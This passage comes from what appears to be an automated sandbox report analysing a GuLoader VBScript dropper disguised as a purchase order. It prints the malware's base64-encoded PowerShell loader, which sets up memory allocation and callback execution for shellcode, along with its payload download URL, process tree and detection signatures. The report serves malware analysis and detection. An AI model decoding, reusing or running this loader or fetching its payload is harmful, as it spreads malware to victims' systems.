QB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAEYAbwByAGwAeQA5ADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAHIAdQBzAHQAbgBpAG4AZwBlAHIALABpAG4AdAAgAFAAbwBpAG4AdABzAG0AZQBuAGgALAByAGUAZgAgAEkAbgB0ADMAMgAgAEYAbwByAGwAeQA5ACwAaQBuAHQAIABXAE8AUgBLAFMASABJAFAATQBFACwAaQBuAHQAIABGAG8AcgBsAHkAOQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAFIAZQBhAGQARgBpAGwAZQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEMARABBAEMAKABpAG4AdAAgAFAAbwBpAG4AdABzAG0AZQBuAGgAMAAsAHUAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADEALABJAG4AdABQAHQAcgAgAFAAbwBpAG4AdABzAG0AZQBuAGgAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAUABvAGkAbgB0AHMAbQBlAG4AaAAzACwAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAEkAbgB0AFAAdAByACAAUABvAGkAbgB0AHMAbQBlAG4AaAA1ACwAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADYAKQA7AA0ACgANAAoAfQANAAoAIgBAAA0ACgAjAEgATwBWAEUARABCAFkAIABWAEUATABTAEUAUwBNACAARQB2AGUAcgBlAGQAIABQAHIAbwBhAG0AYQB0AGUAdQAgAHAAYQBhAHMAawB5AG4AZAAgAEgAYQBhAG4AZABlAHYAZQBuACAAZgBvAHIAbABiAGUAcgBuACAAYgBlAHQAaABhAG4AawBpAG4AZwAgAGUAdQByAG8AdgBpAHMAaQBvACAARgBvAHIAdQBkAGQAaQBzACAADQAKACQARgBvAHIAbAB5ADkAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwATwBWAEUAUgAuAGQAYQB0ACIADQAKACMAYgBvAG8AawBsAGkAZgB0AG0AIABGAG8AcgBzAGEAZQBkAGUAdQAgAFUAbgBkAGUAcgBzACAAYgBvAHIAdABmAG8AcgBrACAAZABlAHQAZQAgAEwAYQBtAHAAYQAgAEIAbABhAG4AYwBoAGUAZAA2ACAAVABhAHcAcABpAGUAbQBhAHMAdAAgAHQAaQBsAHMAdABhAG4AZAAgAGsAYQByAHQAbwBuAG4AIABCAGUAdgBpAGwAZwBlAG4AZAAxACAAQgBhAGcAZwByAHUAbgBkADEAIABUAGEAbgB0AGEAbABpAHMAZQAyACAAQgBsAG8AZAB0ADMAIAANAAoAJABGAG8AcgBsAHkAOQAzAD0AMAA7AA0ACgAkAEYAbwByAGwAeQA5ADkAPQAxADAANAA4ADUANwA2ADsADQAKACQARgBvAHIAbAB5ADkAOAA9AFsARgBvAHIAbAB5ADkAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABGAG8AcgBsAHkAOQAzACwAMAAsAFsAcgBlAGYAXQAkAEYAbwByAGwAeQA5ADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBTAHYAawBsAGkAbgBnAGUAcgBuADEAIABiAGwAYQBuAGsAIABHAHUAdAB0AGUAcgBzAHMAZQAgAFUASABZAEcARwBFAE4AUwBJAEwAIABVAGYAbwByAGQAIABSAGkAZwBzAGcAcgBlACAAQgBMAE8ASwBOAEkAIABFAFYAQQBOAEUAUwAgAFQAcgBhAGMAdABhAGIAIABKAHUAbABlAG4AZQBnACAAYgBuAGYAYQBsAGQAZQBsAHMAIABNAEkAUwBMACAAbwBtAHMAdAAgAFQAZQBzAHQAaQBrAGwAZQBuADYAIABGAGkAbABtACAAcABhAG0AcABhAG4AZwBvAGsAbwAgAA0ACgAkAEYAbwByAGwAeQA5ADQAPQBbAEYAbwByAGwAeQA5ADEAXQA6ADoAVgBpAGEAYwAoACQARgBvAHIAbAB5ADkAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBMAGUAbgBzAGEAZgB0AGEAbABlACAATgBhAHQAdQA4ACAARgBPAFIAUwBBAE0ATABJAE4AIABJAG4AawBvACAAUwBVAEIATQBPAEQARQBBACAAZQBsAGUAZgAgAGMAYQB0AGEAcgBpAG4AZQBzACAAQgByAGEAbgBjAGgAZQBvAHIAIABOAG8AbgBmAGEAbgA1ACAATQBpAHMAdwA3ACAAQgBpAGwAbAAgAHoAbwBlAGYAbwByACAAUABhAGwAYQBlACAASwBoAGEAcgB1AG4AIAByAGUAdAByAGkAYgB1AHQAaQAgAFMAdQBmAGYAcgBhAGcAZQB0ACAATABpAG4AcwBlAHIAbgA3ACAARQBrAHMAaQBsAGUAcgA5ACAAYwBhAHQAYQBsAHkAcwB0AGwAZQAgAFYAYQBnAGkAZgAgAFMAawByAGwAbABlAHIAYQBuAGkAIABSAEUAVABTAEEAIABUAGgAcgBvAGMAawBzAGkAIABJAG4AZQBmAGYAaQBjAGEAYwA4ACAAZwBlAG4AZQByAGEAIABVAGwAdgBlAHUAbgBnACAATgBpAGcAaAB0AHcAYQByAGQAbgAyACAASwBWAEEARABSAEEAVABUAEEAIAANAAoAJABGAG8AcgBsAHkAOQA1AD0AMAA7AA0ACgAjAEwAYQBuAGQAcwByAGUAdABwAG8ANAAgAE8AcABzAHYAdQBsADMAIABLAG8AbgB0AHIAYQAgAHAAcgBlAGQAZQAgAEIAUgBBAE4ARABTAEwAIABTAEsATwBWAEQAQQBIAEwAVQAgAGQAZQBjAGEAbgBhAGwAcwBhACAAawBhAG8AbABpAG4AcwBhACAAZwByAHUAdAB0AGUAZABlACAAUwB0AHIAbQBmAG8AcgBiACAAUABzAGUAdQBkADYAIABIAGUAcAB0AGEAcgBjADgAIABTAGUAYwByACAAYgBpAGwAbABvAHcAaQBuACAAYgBhAHQAYwAgAEYASQBUAFQAQQBCAEwARQAgAFAAaQBuAGsAbgBlAHMAcwBlACAAUABTAE8AQwBJAEQAQQBFAEMASAAgAA0ACgBbAEYAbwByAGwAeQA5ADEAXQA6ADoAQwBEAEEAQwAoACQARgBvAHIAbAB5ADkANAAsACQARgBvAHIAbAB5ADkAMwAsADUAOQAxADcAOQAsAFsAcgBlAGYAXQAkAEYAbwByAGwAeQA5ADUALAAwACkADQAKACMAdABoAGUAbQAgAFMAUABBAFQAQQBMACAAUwB0AGEAbABsAGUAcgBvADgAIABQAGkAcwB0AGkAIABPAGUAZABpAGMAbgAgAEMAQQBOAE4ASQBCAEEATAAgAEwAeQBrAGsAZQBkAGUAcwBzADcAIAB0AHIAZQBkAGkAdgBlAGEAYQByACAAUgBlAGoAcwB0AGYANAAgAFMAVQBQAFAARQBUAEUAUgBSACAARgBsAGUAcgBkAG8AYgAxACAASQBuAG8AcgBkAGkAbgA1ACAASwBOAEIARQAgAFMAdABhAHQAaQAgAFIAZQBzAHQAYQB1AHIAYQB0ADgAIABMAGkAdABoAHkAcwA4ACAATABFAFQAVABSAE8AIABsAGkAZwByAG8AaQBuAHMAcgAgAEQAcgBiAHQAIABkAGUAZwBhAHMAcwBlAHMAIABCAGwAcgBlAHIAbwA4ACAADQAKAFsARgBvAHIAbAB5ADkAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAEYAbwByAGwAeQA5ADMALAAgADAAKQANAAoADQAKAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1164 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 4728 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA741.tmp" "c:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://vegproworld.com/wp-content/Touchb.vbs"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.806121442.0000000009200000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000000.00000003.585259442.000001AB0D281000.00000004.00000020.00020000.00000000.sdmpSUSP_LNK_SuspiciousCommandsDetects LNK file with suspicious contentFlorian Roth
    • 0x1eaa:$s12: Wscript.Shell

    Sigma Signatures

    No Sigma rule has matched

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Found malware configuration
    Source: 00000012.00000002.806121442.0000000009200000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://vegproworld.com/wp-content/Touchb.vbs"}
    Multi AV Scanner detection for submitted file
    Source: PO-19903.vbsReversingLabs: Detection: 19%
    Source: Binary string: k7C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.pdb source: powershell.exe, 00000012.00000002.801305815.0000000004CD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.801562069.0000000004EB4000.00000004.00000800.00020000.00000000.sdmp

    Networking

    barindex
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: https://vegproworld.com/wp-content/Touchb.vbs
    Potential malicious VBS script found (has network functionality)
    Source: Initial file: Matri11.SaveToFile FileName, adSaveCreateOverWrite
    Source: powershell.exe, 00000012.00000002.799500951.0000000004921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000012.00000002.801078678.0000000004BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro

    System Summary

    barindex
    Wscript starts Powershell (via cmd or directly)
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Very long command line found
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 19732
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 19732
    Source: 00000000.00000003.585259442.000001AB0D281000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
    Source: PO-19903.vbsInitial sample: Strings found which are bigger than 50
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00FAB478
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_07711CA0
    Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 98%
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
    Source: PO-19903.vbsReversingLabs: Detection: 19%
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
